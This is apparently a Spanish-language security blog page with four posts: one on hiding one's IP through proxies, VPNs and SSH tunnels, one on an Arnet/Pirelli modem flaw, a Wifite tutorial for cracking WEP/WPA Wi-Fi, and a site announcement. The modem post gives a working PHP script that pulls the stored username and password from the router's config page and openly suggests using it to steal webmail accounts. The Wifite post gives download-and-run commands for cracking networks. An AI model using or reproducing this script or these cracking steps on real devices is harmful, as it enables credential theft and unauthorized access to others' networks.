may 11

Escondiendo nuestra IP y volvernos “Anonimos”

Categorías:

Hacking General

por

Hola gente, aca vengo con un nuevo post, sobre como esconder nuestra ip, antes que nada, voy a comentarles 3 metodos por los cuales podemos volvernos “anonimos” , cada uno tiene lo suyo, en lo personal, prefiero el VPN , pero ahora les muestro todo.

Ventajas:

Saltar restricciones de sitios webs tales como facebook, twitter, youtube, etc.
Saltar restricciones de paises, ejemplo, si un sitio no admite una ip de rango argentino, usamos un proxy online yankee y listo el pollo.

Desventajas:

Velocidad que da bastante que hablar con “algunos” servidores
Algunos son faciles de rastrear o identificar como proxy.  (Osea, al pedo)

Bueno ahora les comento los 3 metodos:

[Proxys]

Segun wikipedia :

Un proxy, en una red informática, es un programa o dispositivo que realiza una acción en representación de otro, esto es, si una hipotética máquina A solicita un recurso a una C, lo hará mediante una petición a B; C entonces no sabrá que la petición procedió originalmente de A. Esta situación estratégica de punto intermedio suele ser aprovechada para soportar una serie de funcionalidades: proporcionar caché, control de acceso, registro del tráfico, prohibir cierto tipo de tráfico etcétera.

Su finalidad más habitual es la de servidor proxy, que consiste en interceptar las conexiones de red que un cliente hace a un servidor de destino, por varios motivos posibles como seguridad, rendimiento, anonimato, etc. Esta función de servidor proxy puede ser realizada por un programa o dispositivo.

Las 2 formas mas comunes y eficaces son las “Proxy’s Web” y las Comunes.

En http://www.proxys.com.ar/  y http://hidemyass.com/proxy-list/ vamos a encontrar una lista bastante grande de proxys con sus respectivos puertos y una clasificacion en: anonimato, gran anonimato, transparente o Elite. Estas ip’s las configuras en tu navegador y listo.

Y en proxys online web, vamos a encontrar varios sitios pero para mi los mejores son:

http://hidemyass.com/
http://dtunnel.com
http://www.tubeoxy.com
http://www.kproxy.biz/
http://atunnel.com/
http://www.proxy4free.com/list/webproxy1.html

Aca es diferente, pones la url del sitio donde queres navegar y listo, estas navegando sobre otra ip, y para comprobar la eficacia del mismo podes probar entrando a my-ip.es y te dice la ip “tuya”

[Ultra surf]

Este no es un metodo, pero me gustaria dedicarle un parrafo, es un proxy comun y corriente, pero ha tenido tanto exito no solamente por la eficacia del mismo, sino por su portabilidad, el programa no pesa mas de 1 mb y solamente lo abris y automaticamente te detecta un proxy mas cercano para una mayor velocidad, y listo, ya esta TODA tu pc bajo un proxy.

Sitio web: http://ultrasurf.us/

[VPN]

Una red privada virtual, RPV, o VPN de las siglas en inglés de Virtual Private Network, es una tecnología de red que permite una extensión de la red local sobre una red pública o no controlada.

Ejemplos comunes son la posibilidad de conectar dos o más sucursales de una empresa utilizando como vínculo Internet, permitir a los miembros del equipo de soporte técnico la conexión desde su casa al centro de cómputo, o que un usuario pueda acceder a su equipo doméstico desde un sitio remoto, como por ejemplo un hotel. Todo ello utilizando la infraestructura de Internet.

En pocas palabras, es como si nos conectaramos a otra red dentro de nuestra misma red.

Ventajas: Son rapidas y eficaces

Desventajas: La mayoria son PAGAS y en caso de ser free siempre vienen con una condicion (temporales, etc)

Algunas gratuitas:
http://www.tunnelbear.com/
http://openvpn.net/
http://cyberghostvpn.com/
http://www.xpdo.net/

 

[TUNEL SSH]

Túnel SSH

El protocolo SSH (secure shell) se utiliza con frecuencia para tunelizar tráfico confidencial sobre Internet de una manera segura. Por ejemplo, un servidor de ficheros puede compartir archivos usando el protocolo SMB (Server Message Block), cuyos datos no viajan cifrados. Esto permitiría que una tercera parte, que tuviera acceso a la conexión (algo posible si las comunicaciones se realizan en Internet) pudiera examinar a conciencia el contenido de cada fichero trasmitido.

Para poder montar el sistema de archivo de forma segura, se establece una conexión mediante un túnel SSH que encamina todo el tráfico SMB al servidor de archivos dentro de una conexión cifrada SSH. Aunque el protocolo SMB sigue siendo inseguro, al viajar dentro de una conexión cifrada se impide el acceso al mismo.

Por ejemplo, para conectar con un servidor web de forma segura, utilizando SSH, haríamos que el cliente web, en vez de conectarse al servidor directamente, se conecte a un cliente SSH. El cliente SSH se conectaría con el servidor tunelizado, el cual a su vez se conectaría con el servidor web final. Lo atractivo de este sistema es que hemos añadido una capa de cifrado sin necesidad de alterar ni el cliente ni el servidor web.

Ventajas: Anonimato puro e.e – Rapidez – No hay cambios de parte del cliente y servidor

Desventajas: La mayoria son de pago, pocos son gratuitos

Lista de los gratuitos/pagos:

http://hypeshell.com/

https://camolist.com/

http://shellmix.com/index.php/free-account/free-shell-account

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • LinkedIn
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Etiquetas: , , , , , , , , , , ,

Sin comentarios

may 02

Arnet Modem Vuln (Pirelli) + Tool PHP

Categorías:

Hacking General

por

Hola, aca les traigo otro post que habia realizado en otro sitio y bueno lo comparto aca.
¿Como empezo todo?

Me habia olvidado la contraseña de mi usuario de arnet, y bueno nose como fue todo que entre a investigar el codigo de fuente y bueno, tenia este pequeño problema.

Datos sobre la vulnerabilidad:
Bueno antes que nada la vulnerabilidad consiste en que la contraseña se ve a la vista, no es necesario pasarle nada de ver los asteriscos ni nada de eso.

Precaucion:
Creo que esta es una buena manera de robar el usuario, ya que el usuario es el mismo que el del webmail de arnet, por lo cual si lo usan pueden llegar a encontrar algo lindo o algun dato copado.

Script:
El script esta codeado en PHP, y lo que hace basicamente es tomar esos datos sin necesidad de ir uno viendo el codigo de fuente, etc..

Code PHP:

<?php
$buffer = @file_get_contents('http://10.0.0.2/wansinglecfg.cmd?action=view');
preg_match('/onLoad="frmLoad\(\'(.+?)\', \'(.+?)\',.+\);"/i', $buffer, $result);
echo '<center><h1>Arnet Modem Vuln By Virtux</h1>';
echo '<b><p>User:</b><font color="red"> ' . $result[1] . '</font></p>';
echo '<p><b>Pass:</b><font color="red"> ' . $result[2] . '</font></p>';
echo '<br>';
echo '<br>';
echo '<b>GreeTz:</b> Feme, Whitesec.org, Oceanik6, Tr4sh, eFeDeZeta</center></b>';
?>

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • LinkedIn
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Etiquetas: , , , , , , , , , ,

Sin comentarios

may 02

Wifite: Herramienta automatizada para crackeo de redes wireless

Categorías:

Hacking Wireless

por

 

Hola gente, bueno aca les traigo una herramienta automatizada que me vino bastante al pelo, si bien dice que es para “Backtrack 4″, si tenes alguna otra distro no importa, porque con instalar los paquetes:

* Aircrack-ng-1.1
* xterm
* python-tk
* macchanger
* python2.5
* pyrit

Ya estas, pero bueno. Aca les traigo mas o menos como usarlo, este tuto lo modifique por la version actual, no hay mucha ciencia ni muchos comandos, es una herramienta automatizada por lo cual, ya hace todo por vos.

Comento: Tiene 2 versiones: La GUI y la de CONSOLA, basicamente es lo mismo! no hay diferencias.

Para descargarlo:

wget -O wifite.py http://wifite.googlecode.com/files/wifite.py

Una vez descargado, le das permisos

chmod +x wifite.py

Y por ultimo lo ejecutas con permisos de root:

sudo ./wifite.py

Aviso para los que no saben:
WEP: Son mas facil de crackear, ya que con obtener los ivs (paquetes) se consigue la password
WPA y sus agregados: Son mas dificiles, ya que se necesita clientes y un diccionario (aveces).

(Si quieren que realice un video de demostracion, y recaudo a 5 personas que digan que si, lo hago)

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • LinkedIn
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Etiquetas: , , , , , , , ,

Un comentario

may 02

Apertura de White Security

Categorías:

Noticias WhiteSec

por

Apertura a White Security

White Security , inicio como un grupo de autodidactas de la informatica que luego formaron un emprendimiento como expertos en seguridad informatica, brindando servicios tales como, administracion de dedicados, testeo de  aplicaciones webs, etc. Ahora, este sitio se transformara en un lugar donde podras encontrar diferentes post sobre seguridad informatica para cualquier persona, sea una inexperta como una que si lo sea.

Estamos en proceso de construccion de la web, si quieres ser parte de brindar info de seguridad informatica solo manda un mail a: virtux(at)whitesec(dot)org (Conocimientos – Trayectoria – y demás.)

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • LinkedIn
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Esta entrada no tiene ninguna etiqueta

Sin comentarios